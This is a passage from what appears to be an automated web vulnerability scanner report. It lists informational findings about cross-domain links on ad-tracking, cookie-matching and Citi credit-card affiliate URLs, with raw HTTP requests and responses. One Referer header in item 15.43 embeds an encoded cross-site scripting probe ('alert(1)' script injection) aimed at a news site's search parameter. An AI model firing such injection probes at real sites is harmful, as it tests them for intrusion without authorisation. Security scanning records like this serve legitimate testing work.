http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=111115b420113e068817052b40de13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111115b420113e068817052b40de13

Request

GET /link/click?lid=41000000032191799&mid=111115b420113e068817052b40de13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111115b420113e068817052b40de13 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 10:40:15 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=111115b420113e068817052b40de13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111115b420113e068817052b40de13
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 10:40:15 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=111115b420113e068817052b40de13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111115b420113e068817052b40de13">here</A>
...[SNIP]...

15.40. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000032191799&mid=1117dffc2011e8065b1705fd423724&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117dffc2011e8065b1705fd423724

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=1117dffc2011e8065b1705fd423724&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117dffc2011e8065b1705fd423724

Request

GET /link/click?lid=41000000032191799&mid=1117dffc2011e8065b1705fd423724&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117dffc2011e8065b1705fd423724 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 10:42:26 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=1117dffc2011e8065b1705fd423724&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117dffc2011e8065b1705fd423724
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 10:42:26 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=1117dffc2011e8065b1705fd423724&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117dffc2011e8065b1705fd423724">here</A>
...[SNIP]...

15.41. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000015500165&mid=11263fc820119c061b17058840e528&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11263fc820119c061b17058840e528

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000015500165&mid=11263fc820119c061b17058840e528&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11263fc820119c061b17058840e528

Request

GET /link/click?lid=41000000015500165&mid=11263fc820119c061b17058840e528&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11263fc820119c061b17058840e528 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=1477&pgpos=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 10:40:32 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000015500165&mid=11263fc820119c061b17058840e528&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11263fc820119c061b17058840e528
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 10:40:32 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000015500165&mid=11263fc820119c061b17058840e528&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11263fc820119c061b17058840e528">here</A>
...[SNIP]...

15.42. http://clickserve.cc-dt.com/link/tplclick previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/tplclick

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/tplclick?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13

The response contains the following link to another domain:

http://gan.doubleclick.net/gan_click?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13

Request

GET /link/tplclick?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105064&pg=1477&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 10:40:15 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/gan_click?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 10:40:15 GMT
Content-Length: 492

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/gan_click?lid=41000000030703945&pubid=21000000000112308&mid=11229c4f20117a0653170528407c13&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D11229c4f20117a0653170528407c13">here</A>
...[SNIP]...

15.43. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=rfi&forward=

The response contains the following link to another domain:

http://a.rfihub.com/cm?id=CAESEA0pzwV4-SdN2wuhHcO4rdI&cver=1&forward=

Request

GET /pixel?nid=rfi&forward= HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Found
Location: http://a.rfihub.com/cm?id=CAESEA0pzwV4-SdN2wuhHcO4rdI&cver=1&forward=
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Fri, 17 Jun 2011 10:11:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 274
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://a.rfihub.com/cm?id=CAESEA0pzwV4-SdN2wuhHcO4rdI&cver=1&forward=">here</A>
...[SNIP]...

15.44. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=themig

The response contains the following link to another domain:

http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1

Request

GET /pixel?nid=themig HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 16:07:52 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 280
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://matcher.bidder7.mookie1.com/google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=1">here</A>
...[SNIP]...

15.45. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=aol1

The response contains the following link to another domain:

http://cmap.dc.ace.advertising.com/dccm.ashx?id=CAESEMMQCmN0Wn5n9azvknaCfA0&cver=1

Request

GET /pixel?nid=aol1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUACping.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://cmap.dc.ace.advertising.com/dccm.ashx?id=CAESEMMQCmN0Wn5n9azvknaCfA0&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 17:56:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://cmap.dc.ace.advertising.com/dccm.ashx?id=CAESEMMQCmN0Wn5n9azvknaCfA0&cver=1">here</A>
...[SNIP]...

15.46. http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/Dividend/May2011/Q2/12mo/100cash/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/Dividend/May2011/Q2/12mo/100cash/default.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer%5F631523784&ProspectID=F0BA75EED46846189B0AC8DBD524E4BC

The response contains the following link to another domain:

http://view.atdmt.com/iaction/96509_USC_5_2011_Dividend_12_12_100_cash_back

Request

Response

15.47. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/MC/external/affiliate/Mar2011/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631523782&ProspectID=0054B2D103DB4175848F37B88E182CA1

The response contains the following link to another domain:

http://view.atdmt.com/iaction/91913_USC_Plat_Select_MC_2_2011_ext_aff_2121_p

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:40:33 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/
Date: Fri, 17 Jun 2011 10:40:32 GMT
Connection: close
Content-Length: 5829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<body>
<iframe src="http://view.atdmt.com/iaction/91913_USC_Plat_Select_MC_2_2011_ext_aff_2121_p" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

15.48. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631524418&ProspectID=E5654139F6B747CBA7F80536311316E9

The response contains the following link to another domain:

http://view.atdmt.com/iaction/91914_USC_Plat_Select_Visa_2_2011_ext_aff_2121_p

Request

Response

15.49. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer%5F631524426&ProspectID=3F41C92F74AE43D4B3334B0467420B9F

The response contains the following links to other domains:

http://view.atdmt.com/iaction/95932_USC_5_2011_TY_Pref_Card_Ext_15_months
http://www.citibank.com/us/cards/privacy.htm
https://creditcards.citi.com/
https://www.citibank.com/us/cards/disclaim.htm

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:41:23 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/
Date: Fri, 17 Jun 2011 10:41:22 GMT
Connection: close
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<body>
<iframe src="http://view.atdmt.com/iaction/95932_USC_5_2011_TY_Pref_Card_Ext_15_months" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<li class="last">
                       <a class="external" href="https://creditcards.citi.com/" target="_blank">Citicards.com</a>
...[SNIP]...
<p>
                   <a class="external" href="http://www.citibank.com/us/cards/privacy.htm" target="_blank">Privacy</a> |
                   <a class="external" href="https://www.citibank.com/us/cards/disclaim.htm" target="_blank">Terms & Conditions</a>
...[SNIP]...
<p class="legal">© 2011 Citibank (South Dakota), N.A. <a class="external" href="https://creditcards.citi.com/">www.citicards.com</a>
...[SNIP]...

15.50. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631523794&ProspectID=DF3259D003E14F63AD487F4185EEA981

The response contains the following link to another domain:

http://view.atdmt.com/iaction/91915_USC_Diamond_Pref_2_2011_ext_aff_2121_p

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 10:41:37 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; path=/
Date: Fri, 17 Jun 2011 10:41:36 GMT
Connection: close
Content-Length: 10853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Citi® Diamond Preferred® Card</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
<body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
<iframe src="http://view.atdmt.com/iaction/91915_USC_Diamond_Pref_2_2011_ext_aff_2121_p" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

15.51. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=outdoors%3Eoutdoor%20power%20equipment%3Ewalk%20behind%20mowers;ord=9370099140796.81?

The response contains the following link to another domain:

http://r.turn.com/r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=

Request

GET /activityi;src=3076801;type=homed040;cat=homed063;u1=outdoors%3Eoutdoor%20power%20equipment%3Ewalk%20behind%20mowers;ord=9370099140796.81? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 16 Jun 2011 11:27:02 GMT
Expires: Thu, 16 Jun 2011 11:27:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 480
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG SRC="http://ad.doubleclick.net/activity;src=3076801;type=homed040;cat=homed639;ord=1;num=1277709612?" WIDTH=1 HEIGHT=1 BORDER=0 ALT=""/><img border="0" src="http://r.turn.com/r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=">
</body>
...[SNIP]...

15.52. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000035026728&pubid=21000000000112308&mid=111fb251201142060717058a405b22&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111fb251201142060717058a405b22

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer_631523784

Request

GET /gan_click?lid=41000000035026728&pubid=21000000000112308&mid=111fb251201142060717058a405b22&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D111fb251201142060717058a405b22 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144464&pg=1477&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217737468617459544B4BBFBEB2A6A39A928498FEFAF6E4EAC5C2D6CD204E6&BT_TRF=49121&app=UNSOL&sc=4T4ZJW71&m=4CJ5MDR210W&langId=EN&siteId=CB&B=M&screenID=3000&uc=AQV&t=t&link=Consumer_631523784
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 17 Jun 2011 10:40:24 GMT
Server: ads-affiliate-network-event-server
Content-Length: 479
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
